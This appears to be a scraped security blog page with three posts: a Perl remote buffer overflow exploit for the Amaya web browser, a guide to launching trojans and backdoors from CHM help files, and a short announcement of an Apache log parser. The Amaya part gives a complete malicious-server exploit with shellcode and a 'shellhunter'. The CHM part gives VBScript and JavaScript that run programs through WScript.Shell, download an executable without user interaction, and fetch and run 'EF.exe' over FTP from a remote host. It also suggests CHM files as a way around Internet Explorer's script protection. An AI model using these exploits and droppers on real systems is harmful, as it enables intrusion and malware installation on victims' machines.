Amaya Web Browser

Amaya Web Browser <= 11.0.1 Remote Buffer Overflow Exploit

Vulnerability discovery & Exploit by SkD

We will start with a description of the affected software:

Amaya is a Web editor, i.e. a tool used to create and update documents directly on the Web. Browsing features are seamlessly integrated with the editing and remote access features in a uniform environment. This follows the original vision of the Web as a space for collaboration and not just a one-way publishing medium.

The vulnerability lies in the way Amaya (version 11.0.1 and below) parses HTML tags. Certain tags trigger different vulnerabilites, mostly overflows but each has a different environment for exploitation.

I selected that the “<td nowrap>” and the “<title(overflow)>” tags were the most convenient to use for the exploit.

Here is a picture of the debugger’s state when the buffer overflow occurs with the “<td nowrap>” tag:

Debugger state after overflow (Amaya)

As we can see the EIP is fully controllable but to exploit the issue there are quite a few problems:

  • The buffer can only have characters from (hex) 0×00 to 0x7f, 0×80 => and above will corrupt the buffer with uneeded characters so the putting the shellcode and finding return addresses will be a problem.
  • Registers point at random places except for ESI which can be controlled to point to a specified location with a correct calculation.
  • Finding a JMP ESP/CALL ESP in one of the Amaya’s native modules will be hard because none of them include the allowed characters (we want to make it universal).
  • Heap layout is randomized.

Please note that I was working on this on Windows Vista SP1 so it may differ with XP, 2003, etc.

Okay, so what can we do? This won’t be exploited the normal way with the classic jmp esp or there isn’t any SEH handlers to exploit so what is there to do? Like I mentioned in the previous list, ESI points to a controllable region in the stack. This region will vary if a calculation for the junk characters is not correct (you will see what I am talking about in the exploit code).  So to combat this problem we must look to the heap for the clean buffer before transformation. Guess what? EDI points close to this but it is random so I cannot just decrease EDI by a static number!  What I did was a similar method to egghunting as in heap overflows but my new method is called, shellhunting. The conclusion is that the shellhunter must be alphanumerical (well, mostly) and it must look for the shellcode in the heap pointed by EDI.

This is a advanced stack overflow exploit which also involves the heap! Please remember that this will only work on Vista SP 1 ( I tested it on XP but different heap layouts again made it a hassle for me to change :) ).

This is the stack and memory when the buffer involves characters over 0×80 (this is the shellcode):

Stack state

And here is the shellcode so you can compare!

my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47".
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38".
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48".
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58".
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".
"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38".
"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".
"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47".
"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a".
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".
"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53".
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57".
"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39".
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46".
"\x4e\x46\x43\x36\x42\x50\x5a";

Very corrupted data, like that we cannot execute anything because of malformed instructions (the decoder for the alphanumerical shellcode will have also no chance to work).  It is clear that the only way will be to look at the heap.

Now I will describe how my shellhunter works!

  1. The shellhunter will start as being 98% alphanumerical so it can be successfully executed.
  2. The “lookout” values must not cause an exception because we will redirect the execution flow to those values!
  3. It will loop and search the heap for the “lookout” values INFRONT of the shellcode.
  4. Once the “lookout” values are located, PUSH EDI and then RETN to that address.

This is efficient and it will work one-hundred percent on every try the browser parses the HTML page.

You can also see that I am using an addition with the $additionaddr variable, this is because the variable cannot be on the heap next to the corrupted data! So we basicially add a few bytes to the variable in the register EAX that holds the $additionaddr that will turn into the “lookout” value so the shellhunter can easily compare data in the heap!

I hope you learned something today ladies and gents! The exploit is included below!

#!/usr/bin/perl
#
# Amaya Web Browser &lt;= 11.0.1 Remote Buffer Overflow Exploit
# Found/Exploit by SkD ([email protected])
#                ([email protected]  )
# -----------------------------------------------
# This is advanced buffer overflow exploitation using
# my new method called shellhunting :)
#
# Get more information about this at http://abysssec.com
#
# Exploit works only on a fully patched Vista SP1, but you
# may need to click 'Refresh' to make the shellcode exec
# sometimes.
#
# Note: Author has no responsibility over the damage you do with this!
 
use strict;
use warnings;
use IO::Socket;
 
my $html;
my $port_listen = 80; # change this to your desired port!
my $listenip = "127.0.0.1"; # change this to your desired IP!
 
# win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47".
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38".
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48".
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58".
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".
"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38".
"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".
"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47".
"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a".
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".
"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53".
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57".
"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39".
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46".
"\x4e\x46\x43\x36\x42\x50\x5a";
 
# my own shell hunter.. :) it is 98% alphanumerical.
# 2nd variant of the shellhunter, to make the exploit more reliable..
my $shellhunter = ("\x58\x58\x40\x40").("\x47" x 4).("\x42" x 6).     #inc edi
("\x42" x 24).("\x42" x 24).("\x39\x07\x75\x8b\x71\x71").
("\x47\x47\x47\x47\x57\xFF\x65\x78\x77\x76");
my $overflow = "\x42" x 158;
my $overflow2 = "\x42" x 4;
my $overflow3 = "\x43" x 430;
my $overflow4len = 977 - ((length($shellhunter) - 7));   #very important calculation
my $overflow4 = "\x44" x $overflow4len;
my $sled = "\x42" x 12;
my $sled2 = "\x41" x 24;
my $eip2 = "\x37\x55\x03\x10";  #10035537 call ecx, this won't be used
my $eip1 = "\x30\x4f\x01\x10"; #10014F30 call esi, this will be used.
my $heapaddr = "\x50\x0e\x08\x10";    #valid char for buffer, heap address
my $lookout = "\x37\x65\x41\x45" x 40;      # 45446537    look out values &lt;-
my $lookout2 = "\x37\x65\x41\x45\x41" x 4;      # 45446537                &lt;-
my $lookout3 = "\x37\x65\x41\x45\x41\x41" x 4;      # 45446537            &lt;-
my $lookout4 = "\x37\x65\x41\x45\x41\x41\x41" x 4;      # 45446537        &lt;-
my $additionaddr = "\x35\x65\x41\x45";    #used for an addition in the shellhunter  (+2)
my $nopsled = "\x90\x90\x90\x90\x90\x90";
my $jmp = "\x75\x0c";
print "[x] Amaya Web Browser &lt;= 11.0.1 Remote Buffer Overflow Exploit\n";
print "[x] Found/Exploit by SkD ([email protected] hotmail.com)([email protected] abysssec.com)\n";
 
while(1)
{
my $sock=new IO::Socket::INET(Listen=&gt;1,LocalAddr =&gt; $listenip,LocalPort=&gt;$port_listen,Proto=&gt;'tcp');
die unless $sock;
print "[x] Waiting for clients on port ".$port_listen."..\n";
my $s;
while($s=$sock-&gt;accept()){
print "[x] Got a client!\n";
my $request = &lt;$s&gt;;
print $s "HTTP/1.0 200 OK\nContent-Type: text/html\n\n";
print "[x] Serving Exploit HTML page :)\n";
print $s "\n".
"\n".
"\n".
"
\n".
"
 
\n".
"\n".
"\r\n";
sleep(0.5);
close $s;
print "[x] Done!\n";
}
}

Execute with .CHM file.


Hi .

In this post i wanna talk about Execute with CHM file or be honest How we can run Trojan, Backdoor In CHM file ? and we will have a few talk Bypass Script Protection In IE .

A CHM help file has a “.chm” extension. It has a set of web pages written in a subset of HTML and a hyperlinked table of contents. CHM format is optimized for reading, as files are heavily indexed. All files are compressed together with LZX compression. Most CHM browsers have the capability to display a table of contents outside of the body text of the help file.

Engine Of CHM :

CHM run HTML page Based On Internet Explorer Engine .

when you run “VBSCRIPT” or “Activex”  or “Object” with Internet Explorer 7 or higher , Script Protection (Activex Security Control) , Alert To  User & Block Script .

ie-activex-security-control

when we are during running  a CHM file , we Can Run & Execute “Object” + “Vb Script” + “JavaScript “ Without Any Error , but If  our Script  inclusive  ActiveX control , We will See a Basic Alert .

Execute IN CHM :

we Need A Program To Create CHM file , I like to  USE WINCHM (free Edition) :

http://www.softany.com/winchm/

For Edit VBSCRIPT  [With IDE] :

http://www.vbsedit.com/

vbseditor

Offline Mode (Intro) :

With This Object ID :

{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}

Call “Windows Script Host Shell Object ” with Object :

Example :
<html>
<object id=”wsh”
classid=”clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B”></object>
<script>
wsh.Run(“c:\windows\system32\calc.exe”);
</script>
</html>

Or  :

<HTML>
<SCRIPT>
function PROCJavascriptRunProgramParameter( programNameS,
parameterS )
{
var shell = new ActiveXObject(“WScript.Shell”);
var quoteS = String.fromCharCode( 34 );
shell.run( quoteS + programNameS + quoteS + ” ” + parameterS, 1,
false );
self.close();
}
</SCRIPT>
<BODY ONLOAD=’PROCJavascriptRunProgramParameter( “C:/windows/system32/calc.exe”, “names.nsf” );’>
</BODY>


Online Mode (Backdoor & Script Bypass Mode ) :

we have three Step to do :

1- Download .EXE file (without User InterAction)
2- Save File in Victim PC .
3- RUN It .

for download with VBSCRIPT  I USED This Objects :

-Microsoft.XMLHTTP
-MSXML2.ServerXMLHTTP
-WinHttp.WinHttpRequest.5.1
-WinHttp.WinHttpRequest

Following This Example :

<script language=vbscript>
Dim Http
Set Http = CreateObject(“WinHttp.WinHttpRequest.5.1″)
URL = “http://abysssec.com”
‘Send request To URL
Http.Open “GET”, URL, False
Http.Send
‘Get response data As a string
BinaryGetURL = Http.ResponseBody
</script>

SAVE FILE  [ Achilles heel  IN CHM ] :

Save File & Execute Objects , Run Activex In IE & CHM .

IF You Can Find a way to bypass ActiveX Alert You can Find lot’s of BUG‘s .

Example OF Bug :

http://www.milw0rm.com/exploits/719 [2004]

Activex Alert :

alert

Note : we have some bypass trick maybe we disclosure a few of them here soon .

But until that Time You can use This method for Download [FTP Client ] :

Option Explicit
Dim objFSO, objMyFile, objShell, strFTPScriptFileName
Dim strLocalFolderName, strFTPServerName, strLoginID, strFTPServerDir
Dim strPassword, strFTPServerFolder, objPassword, objFolder,FolderContent, fso, CleanPath, file, Flag

‘Change this, foldername = local dir (where files must be ftp’d TO)
strLocalFolderName = “c:\”

‘ Server where you are ftp’ing TO
strFTPServerName = “abysssec.com”

‘ Username you use to ftp
strLoginID = “test”

‘ Initialize variables
strPassword = “test”
strFTPServerDir = “/www”

‘ Change this to the folder where the files are on the source server
strFTPServerFolder = “/www”

‘The follow lines of code generate the FTP script file on the fly,
‘because the directory name changes every time its run

strFTPScriptFileName = strLocalFolderName & “\FTPScript.txt”

Set objFSO = CreateObject(“Scripting.FileSystemObject”)

If (objFSO.FileExists(strFTPScriptFileName)) Then
objFSO.DeleteFile(strFTPScriptFileName)
End If

Set objMyFile = objFSO.CreateTextFile(strFTPScriptFileName, True)
‘objMyFile.WriteLine (“ftp -s open ” & strFTPServerName)
objMyFile.WriteLine (“open ” & strFTPServerName)
objMyFile.WriteLine (strLoginID)
objMyFile.WriteLine (strPassword)

‘strFTPServerDir = InputBox(“Enter directory from which to ftp:”)

‘objMyFile.WriteLine (“cd ” & strFTPServerFolder & strFTPServerDir)
objMyFile.WriteLine (“cd ” & strFTPServerFolder)
‘objMyFile.WriteLine (“bin”)
objMyFile.WriteLine (“lcd ” & strLocalFolderName)
objMyFile.WriteLine (“get EF.exe”)
objMyFile.WriteLine (“bye”)
objMyFile.Close

Set objFSO = Nothing
Set objMyFile = Nothing

‘The following code executes the FTP script. It creates a Shell
‘object and run FTP program on top of it.
Set objShell = WScript.CreateObject( “WScript.Shell” )
objShell.Run (“ftp -s:” & chr(34) & strFTPScriptFileName & chr(34))
‘objShell.Run (strFTPScriptFileName & chr(34))
Set objShell = Nothing

Set fso=CreateObject(“Scripting.FileSystemObject”)
CleanPath=”c:\”

For Each file In fso.GetFolder(strLocalFolderName).Files
Flag = StrComp(file, strFTPScriptFileName ,1)
if Flag = 0 then
file.delete
end if
Next

For Execute You can use it:

<script language=vbscript>
set  shell = CreateObject(“WScript.Shell”)
shell.run( “cmd.exe” )
</script>

——————————————————————————————————————————————-

Bypass Script Protection in CHM :

When You Run This Exploit [ Last Of IE 7 Exploit In this Time ] :

http://www.milw0rm.com/exploits/7410

This Exploit Detect By IE Script Security Protection . You Can Run This Exploit in CHM & Don’t Worry For Execution through  “Heap Spray” Method  .

final

Test IT :

http://abysssec.com/files/Execute-with-IE.chm

OK , deduction :

1 – We can put Backdoor & Trojan in CHM files [Fake Book ]

2- We Can Run IE Exploit in CHM files .

3- We Can Execute & Download & Upload with chm files .

4- We Can Run All COM & DLL Objeects with it .

In future :

1- talk about Heap Spray Method  .

2- Talk About Fuzzing OBJECT .

3- Talk About Bypass Activex Question in .CHM [ If i found It !!!!]


Question ?

———————————————–

abysssec comment problem solved fill free to write your comment and mail your request and questions to us .

DAphne

Apache log parser script

Hello viewers
For long time I was looking for some codes for monitoring APACHE’s log
to detection some attacks and /or some     errors that can help server administrators to have a security solution for web servers.

So is so simple to find but its so dirty :d.
In  first stage script checks number of signatures of some of public attacks , you can change or/and edit them. After calculating errors script shows to you alarm or attention or …. messages and  here you decide  to what to want…
And at last total summary of logs with details was saved on path….
I want to write a better code as soon as possible ;)

here is quick log check’s snapshot

and check details

Last code was so slow !! and heavy .Here is fastest than beta-1 code .
I was check a log file ~ 150MB and getting results in 5 min.
It has been fastest as soon as possible ;) thanks.

Download Source code (beta 2 – cleaned code ! optimized – ):

download : log parser

Get Adobe Flash playerPlugin by wpburn.com wordpress themes